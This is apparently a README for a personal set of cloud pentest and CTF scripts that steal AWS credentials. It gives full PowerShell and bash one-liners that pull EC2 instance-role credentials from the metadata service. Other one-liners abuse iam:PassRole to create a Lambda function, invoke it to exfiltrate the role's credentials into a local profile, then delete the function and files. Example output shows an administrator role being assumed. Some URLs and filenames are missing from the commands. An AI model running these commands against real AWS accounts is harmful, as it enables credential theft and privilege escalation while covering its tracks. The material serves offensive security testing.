This is a collection of scripts to help me on cloud CTFs and pentests.
wget && python
I designed this script to work with Amazon Linux 2 default python libraries. This means its unfortunately a Python2 script because by default Python3 on AL2 does not have the requests library imported. :(
There is a corresponding blog post on my medium blog here if you're interested:
Example output:
Attempting to exfiltrate EC2 instance role credentials.
Attempting to PUT request to metadata endpoint to obtain token for subsequent requests.
Enumerating role name for the EC2 instance profile.
Making final request for credentials
These credentials expire after 6 hours. You can copy and paste this blob into ~/.aws/credentials to quickly make a profile from your host machine.
aws_access_key_id = ASIAfakekeyhere
aws_secret_access_key = examplesecretkey
aws_session_token = actual_value_here
**One-liners to use on a different host to add this key as an AWS CLI profile **
echo -e "BIGBLOBOFBASE64HERE" | base64 -d >> ~/.aws/credentials
$ENCODED = "BIGBLOBOFBASE64HERE";$DECODED=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ENCODED));Add-Content $env:USERPROFILE\.aws\credentials $DECODED;$ENCODED="";$DECODED="";
Run this AWS CLI command to see if your profile works and if the name of the credentials is accurate.
aws --profile AdministratorEc2 sts get-caller-identity
"With access to the iam:PassRole, lambda:AddPermission, and lambda:CreateFunction permissions, an adversary can create a Lambda function with an existing role. This function could then by updated with lambda:AddPermission to allow another principal in another AWS account the permission to invoke it. It is worth noting that the AWS account must already contain a role that can be assumed by Lambda."
This one liner needs to be slightly modified to have you will need to edit $AWS_CLI_PROFILE_NAME and $ROLE_ARN
It will:
- Pull down code
- Zip code
- Create a lambda function with the role and code
- Invoke that function that steals the credentials
- Take the credentials and add them to your ~/.aws/credentials file
- Delete,, output.txt (lambda's output) files
- Delete the function we create/invoked.
- Call sts get-caller-identity with the newly configured "lambda-credentials-exfil"
Protip, you can press the "home" key the bring you the beginning of the command to edit ROLE_ARN and AWS_CLI_PROFILE_NAME.
Power shell one-liner:
$ROLE_ARN="arn:REPLACEME";$AWS_CLI_PROFILE_NAME="REPLACME";Invoke-WebRequest -Uri "" -OutFile "";echo "using --profile $AWS_CLI_PROFILE_NAME for AWS CLI commands";echo "Role Arn is set to $ROLE_ARN";echo "zipping the";Compress-Archive -LiteralPath .\ -DestinationPath .\ -Force;echo "Creating a lambda function with $ROLE_ARN attached. You might need to press enter a few times if you have lots of functions to scroll through.";Start-Sleep -Seconds 5;aws --profile "$AWS_CLI_PROFILE_NAME" lambda create-function --function-name lambda-credentials --role $ROLE_ARN --zip-file fileb://.\ --handler index.lambda_handler --runtime python3.9;echo "Sleep for 10s. Press control + c if you got an error on create.";Start-Sleep -Seconds 5;echo "Invoking Function...";aws --profile "$AWS_CLI_PROFILE_NAME" lambda invoke --function-name lambda-credentials output.txt;echo "Adding the credentials to your ~/.aws/credentials file";$EncodedCreds=`Get-Content output.txt;$DecodedCreds=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($EncodedCreds));Add-Content $env:USERPROFILE\.aws\credentials "$DecodedCreds"; $DecodedCreds="";$EncodedCreds="";del output.txt;$ROLE_ARN="";echo "Check your ~/.aws/credentials file to ensure the profile was added and there's no duplicates.";echo "Deleting the lambda function";aws --profile $AWS_CLI_PROFILE_NAME lambda delete-function --function-name lambda-credentials;del; del;$AWS_CLI_PROFILE_NAME="";aws --profile lambda-credentials-exfil sts get-caller-identity;
Linux one-liner
ROLE_ARN="arn:REPLACEME" && AWS_CLI_PROFILE_NAME="REPLACME" && wget && echo "using --profile $AWS_CLI_PROFILE_NAME for AWS CLI commands" && echo "Role Arn is set to $ROLE_ARN" && echo "Zipping the" && zip -r && echo "Creating a lambda function with $ROLE_ARN attached. You might need to press enter a few times if you have lots of functions to scroll through." && sleep 5 && aws --profile $AWS_CLI_PROFILE_NAME lambda create-function --function-name lambda-credentials --role $ROLE_ARN --zip-file fileb:// --handler index.lambda_handler --runtime python3.9 && echo "Sleep for 5s. Press control + c if you got an error on create." && sleep 5 && echo "Invoking Function..." && aws --profile "$AWS_CLI_PROFILE_NAME" lambda invoke --function-name lambda-credentials output.txt && echo "Adding the credentials to your ~/.aws/credentials file" && base64 -d output.txt >> ~/.aws/credentials && echo "Check your ~/.aws/credentials file to ensure the profile was added and there's no duplicates." && echo "Deleting the lambda function" && aws --profile $AWS_CLI_PROFILE_NAME lambda delete-function --function-name lambda-credentials && rm -rf && rm -rf && rm -rf output.txt && ROLE_ARN="" && AWS_CLI_PROFILE_NAME="" && aws --profile lambda-credentials-exfil sts get-caller-identity
Example Output:
--2022-11-27 18:28:53--
Resolving (,,, ...
Connecting to (||:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 881 [text/plain]
Saving to: ‘’ 100%[=====================================>] 881 --.-KB/s in 0s
2022-11-27 18:28:53 (112 MB/s) - ‘’ saved [881/881]
--profile lizzie-personal
Role Arn is set to arn:aws:iam::FAKEACCTID:role/AdministratorEc2
Zipping the
adding: (deflated 64%)
Creating a lambda function with arn:aws:iam::FAKEACCTID:role/AdministratorEc2 attached. You might need to press enter a few times if you have lots of functions to scroll through.
"FunctionName": "lambda-credentials",
"FunctionArn": "arn:aws:lambda:us-west-2:FAKEACCTID:function:lambda-credentials",
"Runtime": "python3.9",
"Role": "arn:aws:iam::FAKEACCTID1:role/AdministratorEc2",
"Handler": "index.lambda_handler",
"CodeSize": 485,
"Description": "",
"Timeout": 3,
"MemorySize": 128,
"LastModified": "2022-11-28T02:29:01.558+0000",
"CodeSha256": "X5kiMLIR8KpVRQXIjnx7bScth5U=",
"Version": "$LATEST",
"TracingConfig": {
"Mode": "PassThrough"
"RevisionId": "f0e254b8-d0c65ff7275a",
"State": "Pending",
"StateReason": "The function is being created.",
"StateReasonCode": "Creating",
"PackageType": "Zip",
"Architectures": [
"EphemeralStorage": {
"Size": 512
Sleep for 5s. Press control + c if you got an error on create.
Invoking Function...
"StatusCode": 200,
"ExecutedVersion": "$LATEST"
Adding the credentials to your ~/.aws/credentials file
Check your ~/.aws/credentials file to ensure the profile was added and there's no duplicates.
"UserId": "AROAW4IVVFNJ3MEVMIRJT:lambda-credentials",
"Account": "FAKEACCTID",
"Arn": "arn:aws:sts::FAKEACCTID:assumed-role/AdministratorEc2/lambda-credentials"